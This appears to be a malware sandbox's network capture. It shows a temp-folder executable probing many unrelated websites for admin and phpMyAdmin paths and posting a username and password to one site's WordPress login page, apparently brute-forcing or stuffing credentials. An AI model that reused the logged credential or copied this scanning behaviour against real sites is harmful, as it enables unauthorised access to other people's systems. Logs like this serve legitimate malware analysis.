2023-12-22 20:15:13 UTC	6	IN	Data Raw: 31 0d 0a 0a 0d 0a Data Ascii: 1
2023-12-22 20:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
337	192.168.2.4	58374	69.42.204.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	168	OUT	GET /admin/ HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:13 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:15:13 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port
338	192.168.2.4	58556	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	455	OUT	POST /wp-login.php HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=bbc76ng8ktm78c1ea1052vlibv User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 Content-Length: 140 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:13 UTC	140	OUT	Data Raw: 6c 6f 67 3d 74 68 65 70 72 6f 64 75 63 65 62 6f 78 26 70 77 64 3d 70 65 72 72 79 37 30 39 25 34 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=theproducebox&pwd=perry709%40&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:13 UTC	866	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure X-Mod-Pagespeed: 1.13.35.2-0 Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HDn0TsAh9eahtdq2iPRK1ul8%2FSrALb6lzfhRBShbnyGIqWMdS91cshySwQFIpeX6GP8N6Z8bGtUmHCO5fkl3YROlUZRLz99vns9UeUpyvALqmCKM%2BcxyH1ndxhuwhvR9ZlgC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b091dcc6e7476-MIA
2023-12-22 20:15:13 UTC	503	IN	Data Raw: 31 38 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 181f<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 Data Ascii: rel='stylesheet' id='forms-css' href='https://theproducebox.com/wp-admin/css/forms.min.css?ver=6.4.2' media='all'/><link rel='stylesheet' id='l10n-css' href='https://theproducebox.com/wp-admin/css/l10n.min.css?ver=6.4.2' media='all'/><link rel='stylesh
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77 64 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 77 64 22 20 69 64 3d 22 75 73 65 72 5f 70 61 73 73 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 20 70 61 73 73 77 6f 72 64 2d 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 Data Ascii: </p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pwd"><input type="password" name="pwd" id="user_pass" aria-describedby="login_error" class="input password-input" value="" size="20" autocomplete="
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f 61 64 28 29 7d 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 70 20 69 64 3d 22 62 61 63 6b 74 6f 62 6c 6f 67 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 3c 2f 61 3e 09 09 3c 2f 70 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 64 6f 63 75 Data Ascii: h(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnload()}//...</script><p id="backtoblog"><a href="https://theproducebox.com/">← Go to The Produce Box</a></p></div><script type="text/javascript">//<![CDATA[docu
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 Data Ascii: id="wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js
2023-12-22 20:15:13 UTC	204	IN	Data Raw: 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 09 3c 2f 68 74 6d 6c 3e 0a 09 0d 0a Data Ascii: _id":"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></body></html>
2023-12-22 20:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
339	192.168.2.4	58425	64.68.191.221	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	171	OUT	GET //pma/ HTTP/1.1 Host: adelaideclub.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	357	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.adelaideclub.com/pma/ X-Redirect-Reason: Wrong Portal Alias Requested Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:15:13 GMT Connection: close Content-Length: 150
2023-12-22 20:15:13 UTC	150	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 64 65 6c 61 69 64 65 63 6c 75 62 2e 63 6f 6d 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.adelaideclub.com/pma/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
340	192.168.2.4	58447	91.132.253.137	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	179	OUT	GET /index.php HTTP/1.1 Host: flandria-loisirs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:14 UTC	533	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:13 GMT Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=300 Upgrade: h2,h2c Connection: Upgrade, close Location: https://www.flandria-loisirs.com/index.php/ Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:15:13 GMT X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline'; Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:14 UTC	430	IN	Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: 1a2<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.flandria-loisirs.com/index.php/'" /> <title>Redirecting to https://www.flandria-loisirs.com/index.php/</title>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
341	192.168.2.4	58649	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	179	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	643	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:13 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: http://www.thenile.com.au/PhpMyAdmin via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WWLBGUPSpWgfVX68CftCnoie%2FNAQdsxPB%2F%2Bix6gjuhNjNaTYP53l1I4OvVH%2BQu0KbBs%2FAkJJ5c%2Bp8458a1AtJ69wg70HVenWNLEuQrNy%2FlpTQnBaXu7JrC2AavZbfadtm6it5w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b091eaa09098e-MIA
2023-12-22 20:15:13 UTC	251	IN	Data Raw: 66 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 50 68 70 4d 79 41 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: f5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/PhpMyAdmin">here</a>.</p></body></html>
2023-12-22 20:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
342	192.168.2.4	58575	167.235.0.29	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	179	OUT	GET /admin HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:14 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 31 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:14 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:15:14 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:15:14 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab
2023-12-22 20:15:14 UTC	16384	IN	Data Raw: 6f 73 73 68 61 69 72 73 22 3a 22 66 61 6c 20 66 61 2d 63 72 6f 73 73 68 61 69 72 73 22 2c 22 63 73 73 33 22 3a 22 66 61 62 20 66 61 2d 63 73 73 33 22 2c 22 63 75 62 65 73 22 3a 22 66 61 73 20 66 61 2d 63 75 62 65 73 22 2c 22 64 65 6c 69 63 69 6f 75 73 22 3a 22 66 61 62 20 66 61 2d 64 65 6c 69 63 69 6f 75 73 22 2c 22 64 65 73 6b 74 6f 70 22 3a 22 66 61 73 20 66 61 2d 64 65 73 6b 74 6f 70 22 2c 22 64 65 76 69 61 6e 74 61 72 74 22 3a 22 66 61 62 20 66 61 2d 64 65 76 69 61 6e 74 61 72 74 22 2c 22 64 6f 74 2d 63 69 72 63 6c 65 22 3a 22 66 61 72 20 66 61 2d 64 6f 74 2d 63 69 72 63 6c 65 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 66 61 73 20 66 61 2d 64 6f 77 6e 6c 6f 61 64 22 2c 22 64 72 69 62 62 62 6c 65 22 3a 22 66 61 62 20 66 61 2d 64 72 69 62 62 62 6c 65 22 Data Ascii: osshairs":"fal fa-crosshairs","css3":"fab fa-css3","cubes":"fas fa-cubes","delicious":"fab fa-delicious","desktop":"fas fa-desktop","deviantart":"fab fa-deviantart","dot-circle":"far fa-dot-circle","download":"fas fa-download","dribbble":"fab fa-dribbble"
2023-12-22 20:15:14 UTC	16384	IN	Data Raw: 22 20 64 61 74 61 2d 6c 65 76 65 6c 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 64 61 74 61 2d 63 6f 6c 6c 61 70 73 65 3d 22 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 64 61 74 61 2d 73 75 63 63 65 73 73 3d 22 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 75 6c 20 Data Ascii: " data-level="0"> <i class="fas fa-caret-right default-fasize" aria-hidden="true" data-collapse="fa-caret-right default-fasize" data-success="fa-caret-down default-fasize"></i> </a></div><ul
2023-12-22 20:15:14 UTC	12337	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 74 65 78 74 27 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 2d 74 65 78 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 62 75 74 74 6f 6e 73 27 3e 0a 20 20 20 20 